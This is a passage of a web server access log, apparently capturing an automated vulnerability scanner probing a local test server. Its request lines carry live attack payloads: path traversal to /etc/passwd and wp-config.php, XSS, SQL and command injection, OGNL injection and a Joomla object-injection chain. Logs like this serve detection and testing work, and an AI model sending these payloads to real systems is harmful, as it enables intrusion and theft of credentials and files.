/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K6BZb1PWcRstudnlv2PLRmMVZ.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 